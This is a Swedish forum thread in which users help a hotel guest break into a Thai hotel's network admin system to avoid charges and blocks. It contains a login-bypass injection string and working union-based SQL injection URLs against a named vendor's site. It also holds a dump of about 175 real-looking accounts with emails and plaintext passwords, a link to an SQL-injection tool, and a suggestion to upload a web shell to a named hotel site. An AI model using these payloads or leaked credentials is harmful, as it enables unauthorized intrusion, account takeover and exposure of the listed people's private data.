Komma förbi adminpanel till hotellnätverk?

2011-04-26, 18:36 #13

Medlem

Reg: Jan 2008

Inlägg: 6 033

Citat:

Ursprungligen postat av moshkebab

Testat alla standard kombinationer i adminpanel inget funkar där dock fungerar admin:admin där man loggar in till anslutningen så nu har jag internet iaf.
Jag tror jag har hittat ett hål dock, det finns ett formulär där man kan se sin statistik och där kan man välja datum och det ser ut såhär

http://img852.imageshack.us/i/skrmavbild20110426kl123.png/

och skriver man 1' i "from" fältet får man ett sånt här error, jag antar att det är sårbart för SQLis
men skriver man 1 ORDER BY 5-- tex så får man inga errors, hur ska jag gå vidare om jag vill dumpa databasen så jag kan bypassa systemet och slipper att dom blockerar utorrent och sänker hastigheten osv

http://img709.imageshack.us/i/skrmavbild20110426kl123.png/

' or ''=''

Som användarnamn och lösenord.

Citera

2011-04-26, 19:54 #14

Medlem

Reg: Sep 2010

Inlägg: 2 453

Citat:

Ursprungligen postat av moshkebab

Tjo, sitter o chillar på ett hotell i thailand just nu och jag undrar hur man kommer förbi deras adminpanel? Internetet är skitdyrt och dom blockerar en massa saker

Har försökt med diverse sql-injections i ett par dagar och försökt läsa mig till vilket system dom använder. Men mina hackingskillz är inte så bra så nu ber jag er om en knuff i rätt rikting

Det jag vet än sålänge.

Dom kör det här systemet, bara logga in o provköra det.

http://www.kkthai.com/lisg_v2.4/

Mer kan man läsa om det här
http://translate.google.com/translate?js=n&prev=_t&hl=sv&ie=UTF-8&layout=2&eotf=1&sl=th&tl=en&u=http%3A%2F%2Fwww.k kthai.com

Jag uppskattar all hjälp jag får

admin:suwannahong!

supportkkthai : support@kkthai.com : suwannahong!
jackkkthai : jack@kkthai.com : 225588
jr_min : b.cholada@gmail.com : chol12
arkomvisuttisatong : arkom_la@hotmail.com : 2255889
��ҵ�� : k00k_4@hotmail.com : 12345679
petercanyon : thepeter_2549@yahoo.co.th : 123456
nisit : maxnisit@gmail.com : manit7531
ศราวุธเอี่ยมพ่วง : varrus45@hotmail.com : 17082515
จรัญเห็นแก้ว : petchburi@hotmail.com : 48228436
ชลอ : chalo_29@yahoo.com : แ้ฟสนดฟพๅ
bosoempty : crystaltrap@gmail.com : wvjlkfgvhp
กนกวรรณกาขาว : maize.007@hotmail.com : 010212034
akekarach : lapmak@hotmail.com : Computer99
amnaj002 : amnaj999@hotmail.com : 3219151617
lamindemnar : derfasecgtda@terbuny.net : 3cQPLPH568
เอกพลพรเสรีกุล : ekkpol@hotmail.com : 230714
viroonsastura : vsastura@hotmail.com : 432907
เกียรติศักดิ์รัตนประทีป : k9259@hotmail.com : 6172987
Kittipod : kittipodva@hotmail.com : pompoo0180
เดชธารปัทมชัยยันต์ : onndumrooh@hotmail.com : kkthai
บริษัทอีซูซุอันดามันเซลส์จำกัด : isuzu.phuket@gmail.com : ias076355112
GotIT : siam_imp@yahoo.com : s12345m
ณัฐวัฒน์ปะวันโน : nattawat_it@hotmail.com : nong123456
เอกชัยไชยยอด : theone_nung@hotmail.com : 15156218
jiraphasjaijing : emporuim@gmail.com : newpassword
เดชาพุ่มเข็ม : dachapum@gmail.com : 03032500
คมกฤชบุญรอด : casanova_b@windowslive.com : gfHdohvp
ชิโนรสอ่อนละออ : mos_un004@hotmail.com : lnjvlki
No_limits75 : 1f98ocfd.@gmail.com :
� : te_ornpoom@hotmail.com : tko1978
KittipodVachirapong : kittipodv@gmail.com : pom0180
�� : lm-ice@live.com : 7082558
��ԭ��آ��ҭ : koreancrazy@hotmail.com : 0896600371
��þ�- : n_nicky454@hotmail.com : 34715707
��෾��Ѿ��Թ�� : thep2505@yahoo.com : ptcom2505
kikkkka : kimkam08@hotmail.com : 128kia
��ѡ�� : aek_32@yahoo.com : 5157-32
�ͧ��ʹ�� : thongsainana@hotmail.com : mahmah
�.�.��ȡ��ʹ�� : maisont@hotmail.com : 13733572
��Ȱ��⪵Ԫص��Ѳ�� : thanamest@hotmail.com : immortal1969
nattachai : kool.comsci@hotmail.com : 033045
sudeeu : sudee.u@finansalife.com : teeree11
LaddaSrita : ome_o@hotmail.com : 001234
Krithome : krithome@yahoo.com : krithome
sadayuparakul : sadayu.p@gmail.com : 159753ee
WorawitWaiprib : it@layanaresort.com : alonedragon
��͹��Թ�� : cotelydon_hypocotyl@windowslive.com : yuija_01@hotmail.com
��͹��Թ�� : cotyledon_hypocotyl@windowslive.com : yuija_01@hotmail.com
��ķ�� : pong@stcthailand.com : 11111
��ɰ��ط�� : samutkham@hotmail.com : Mrssomporn
TawinunWiriyananon : itsup@sareeraya.com : sry100
��ش� : sittichern007@hotmail.com : irawin
imbeck : imbeck_7@hotmail.com : pancake
�ç��ҭ�� : tame_ict6@hotmail.com : Bankae
�Ѵ�ҭ : bnet2547@hotmail.com : nuttavut
�Ѫþ�ó : Pb_ndm.45@hotmail.com : bit1845
somyosanantnakin : somyos@jollysuites.com : doraemon
��ᴧ�� : Suchao222@hotmail.com : 844707
damrong : deakmai@hotmail.com : president
��·�Թѹ��йҹ�� : md@viriyagraphicsamui.com : viriya2524
�Թ��ʧ�� : udomworkgroup@hotmail.com : tinna716603
��è��Ǥ�⤵�� : paekay@hotmail.com : 0897701235
�ҹԵ��Ż� : manit_m@hotmail.com : admintoo
��ѹ��Ш�ҧ : kasem075@hotmail.com : 165770
�ҧ��ؾ��Źѹ : nappa_09@windowslive.com : 0845734353
chirayuth : golf_geo@hotmail.com : 077285835
��ѵ��ҹԪ�� : sombat78@hotmail.com : bum113
��ѷ��鹷��ͪ��ӡѴ : kamkeud@gmail.com : w,h-ufwa
som : cokennet25@hotmail.com : 45632155
Banphot : banphot@kpromptservice.com : poiuyt
��ਵ��Ե�� : ppmansion@hotmail.com : 0890891888xga
��ʧ�й� : pon299@hotmail.com : 12123
��Թ�� : sominta@hotmail.com : wkuphrae1095
Pattadon : pkunyabut@gmail.com : dolphinz
��Թ��§ʧ�� : phumi_n@hotmail.com : 07210721
tanapatthongmaen : dekza171@hotmail.com : golf7316491
��ѡ��ѹ�� : siamcolo@msn.com : 87654321
vin2006 : yoye5124@gmail.com : 120424
omikky : samuri_vampir@hotmail.com : leavemealone
��ԭ��آ��ҭ : prinya.s@vsoft.co.th : kkthaip169
��ѡ��Թ�� : surasakrincome@hotmail.com : 4031050101
��Ⱦ�๵÷ͧ : llnj_hai_llsj_llsj_na1983@hotmail.com : 0825135982
�ѹ��ͧᴧ : j_show_class_two@hotmail.com : 046091446
SittiwetSook : fonttt@hotmail.co.jp : fonts123
��ѹ��Ш�ҧ : kasem075@gmail.com : 165770
��͡��ز�ǧ�� : admin@avanahotel.com : s8681844
��Ѳ��ѵ��ҹ�� : pong3039@msn.com : 333333
itboy : jubpas_bird@hotmail.com : birdonly
ਵ�ѵ��ʴ��ҳԪ�� : jetavat@hotmail.com : 8736942
��ѹ�ҵ�� : admin@yantarasiri.com : 66886688
�ѹ��ѡ��ó : bancomdd@gmail.com : paemikasr
��Է��ԭ� : mrkosol@gmail.com : 016903729
Siripongwiriyamanuwong : nut_ippo_za@hotmail.com : 053750006
paracetamon : surapong.ont@hotmail.com : ont12489
paracetamon : surapong.ont@gmail.com : ont12489
TheeraweePornpichayanurak : dtoa2000@hotmail.com : 123456
nainetcup : eakung2002@hotmail.com : 472620215
͹��ѡ�� : anurak--2529@hotmail.com : 2529
somjaiphongrath : maymoum@hotmail.com : 123456
somjaiphongrath : mayaoum@hotmail.com : 123456789
��ö�Է��Ŵ�ǧ : autawit66@hotmail.com : 270522
poangpan : poangpan@alpinegolfresort.com : 7777777
��µ��õ��͹ԡ� : trirat25@hotmail.com : 0812077389
͹��ѡ�� : anuruk_sukma@yahoo.co.th : 066185964
��ɰ�Թ�� : fonraining@yahoo.com : 0890908057
�͡�Ѱ�ѹ��ҹ�� : akedang@hotmail.com : akedang114
Mr.Preechakongboon : paint_cctv@hotmail.com : paint71243
Yuttaya : yuttaya@gmail.com : z100z100
��ѡ��Թ�� : rak_intaros@hotmail.com : 19809051
��෹ủ�� : uten_007@hotmail.com : 0816724678
�Է�Ԫ��سʶҾ� : sittichai2515@gmail.com : kerberos2002
chakkawarnnuangcota : chakkawarn@ies.co.th : syxrapph
��෾�� : chatchai_mek@hotmail.com : 099447044
�ط�Ԫ��ʹ�� : blackdragonjr@hotmail.com : 25191000
kittiwat : kittiwat.kob@gmail.com : kinsukhon
�ع�� : sunisa.s@su.ac.th : picnic9654
പ�� : likeboyonly@hotmail.com : 123456
��Ѳ�� : k_jawat@hotmail.com : adminkak
giggs : sincere_por@hotmail.com : 023946495
�Ѫþ��蹾��Ūҭ�Ԩ : streamer9@hotmail.com : rjocox
��ԧ��ʡ� : happyhall@windowslive.com : 1979happy
weerapun : wnunta@hotmail.com : aodaid
pot : managermee@gmail.com : 0894014500
surapongsajja : t_plus02@hotmail.com : pong1233
�Ѱ�ز��·ѡ�Գ : kidkodnan@hotmail.com : mmmmmmmm
pi : greatonlinekingdvt@gmail.com : lordonline
�þ��ҭ��С�� : worapohn_tae@hotmail.com : 45070759
bbb : smithf1000@yahoo.com : mqd62y5b
͹ѹ��ѹ��ó� : nunkung@gmail.com : mercury
pai_in_love : pran1446@hotmail.com : p12345n
��ѡ��ʹ�� : eno-5@hotmail.com : 121597
aujjuaei : vbkifz@ucqbih.com : oBmC4h
RangsitMakarukpinyo : rangsit@msn.com : password
��Ԫ��º�ҹ�� : apichai_ata@hotmail.com : 124333
tomeboy : phuksuka@yahoo.com : tomeboy123
phadungsak : rascality@hotmail.co.th : PhadungsaK
��Ԫ��ͺ�ѧ��Ѵ : wit_r@hotmail.com : adidas0532ro
NaresWattanayu : agdlp@hotmail.com : P@ssw0rd
��Թ��ǧ : jingjork_@hotmail.com : 072553
BBBB : bird_1124@hotmail.com : admin1124
�ѡ��ظ��ġ�� : sjakrawoot@hotmail.com : saorerk
��þ��׹ : khonyuen@hotmail.com : 490100
sit : sit@hotmail.com : sit99
��ط��ǧ�� : bangkokcam@hotmail.com : 0850071744
��»��ҹ�� : bangkokcam2554@hotmail.com : b12345
��¸�� : jo_sut@hotmail.com : 0816440575
��⹪��ʺ�� : anocha@mail.com : 03060306
Mr.WeerasakSangsilloes : ps0031087@gmail.com : 150623
��þת : mass_knine@hotmail.com : 0864113736
thaiscout : thaiscoutcamp@gmail.com : pwkkthtscgm
jamong : jamong@hotmail.com : juyjuy
�ê��á��ط� : it@ramadakhaolak.com : 001835
kk : kk@kk.com : kkkk
abc-test : abc@abc.com : 123456
mmmmmmm : suzurun2526@hotmail.com : 987456
��Է�� : aomari09@gmail.com : 30112521
เทพฤทธิ์อิงคศิริ : tpr@rpcthai.com : 8070416
ต้น : travel2thai@hotmail.com : 12345678
นัทพรรณศรีลาโพธิ์ : k_international@hotmail.com : travis
thanomsak : nic_thanomsak@hotmail.com : 029166057
laosvong : laosvong@gmail.com : vongvong
จิรพนธ์ธนศานติ : darkprism@msn.com : 180509
bokang : pittayut_c@hotmail.com : 24486050
Panithi : panithi_live@hotmail.com : 08521abcdef
SompongKalong : skalong@gmail.com : skl20000
สุวรรณาบำเพ็ญเกียรติกุล : noonatatee@hotmail.com : 1472
weerapunnunta : weerapun@wattanasystem.co.th : aodaid
Birdie : contact@mchouse.org.au : Qo2kGsJA
พิษณุวัฒน์นนทมาลย์ : it@imperialboathouse.com : 0867415913
นรุตม์กิตติกวินวงศ์ : k.narout@gmail.com : oi69,N
AmornpongTrongtorkit : amornpong@oceanresortgroup.net : 132668860
สมคิดอดุลรัมย์ : mecburiram@yahoo.com : adminmech
thanapatmalawan : hospitalos_pai@yahoo.com : mabanana
อดิศรอ่อนละออ : zahope@hotmail.com : 01220122

Sidan var iallafall inte så säker

Citera

2011-04-26, 21:33 #15

Medlem

Reg: Jul 2006

Inlägg: 10

Haha vänta, knäckte du kkthai´s hemsida? förklara

Citera

2011-04-26, 21:40 #16

Medlem

Reg: Sep 2010

Inlägg: 2 453

Citat:

Ursprungligen postat av moshkebab

Haha vänta, knäckte du kkthai´s hemsida? förklara

Haha aa sql injektion på kkthai.com och dumpade alla konton (174 st + 1 admin konto).

Citera

2011-04-26, 21:46 #17

Medlem

Reg: Jul 2006

Inlägg: 10

haha, knas

Det där var ju ett test system bara

Lust att förklara hur du gick tillväga med SQLi´n?

Citera

2011-04-26, 21:49 #18

Medlem

Reg: Sep 2010

Inlägg: 2 453

Citat:

Ursprungligen postat av moshkebab

haha, knas

Det där var ju ett test system bara

Lust att förklara hur du gick tillväga med SQLi´n?

http://www.kkthai.com/wboard/wboard.php?is_menu=&cat=-8+union+select+1,@@version,3

http://www.kkthai.com/wboard/wboard.php?is_menu=&cat=-8+union+select+1,group_concat%28name,0x3a,email,0x 3a,pass%29,3+from+cs_member

Citera

2011-04-26, 23:16 #19

Medlem

Reg: Okt 2010

Inlägg: 645

Citat:

Ursprungligen postat av moshkebab

Testat alla standard kombinationer i adminpanel inget funkar där dock fungerar admin:admin där man loggar in till anslutningen så nu har jag internet iaf.
Jag tror jag har hittat ett hål dock, det finns ett formulär där man kan se sin statistik och där kan man välja datum och det ser ut såhär

http://img852.imageshack.us/i/skrmavbild20110426kl123.png/

och skriver man 1' i "from" fältet får man ett sånt här error, jag antar att det är sårbart för SQLis
men skriver man 1 ORDER BY 5-- tex så får man inga errors, hur ska jag gå vidare om jag vill dumpa databasen så jag kan bypassa systemet och slipper att dom blockerar utorrent och sänker hastigheten osv

http://img709.imageshack.us/i/skrmavbild20110426kl123.png/

Kan du inte ge ut hotellets hemsida? Går det att utföra SQLi i adressfältet?
Detta program hjälper dig med SQLi: http://www.speedyshare.com/files/28164651/SQLIHelperV.2.7.rar

Citera

2011-04-27, 11:29 #20

Medlem

Reg: Jul 2006

Inlägg: 10

Ja visst, http://www.kamalabeach.com/ det ända dom har som är användbart är ett galleri och då lär du ju finnas ett uppladdnings script där man kan ladda upp ett shell eller?

Sitter för tillfället i OSX miljö och kan tyvär inte prova programmet vet du om det fungerar med Crossover?

Citera

2011-04-27, 15:45 #21

Medlem

Reg: Okt 2010

Inlägg: 645

Reservation systemets hemsida, som bl.a. det hotell du bor på använder, är sårbart mot SQLi. Hotellets hemsida använder tredjepart programvara för att låta folk reservera via sin hemsida. Verkar dock lite komplicerat om du ska gå den vägen.

Citera

Komma förbi adminpanel till hotellnätverk?

Skapa ett konto eller logga in för att kommentera

Skapa ett konto

Logga in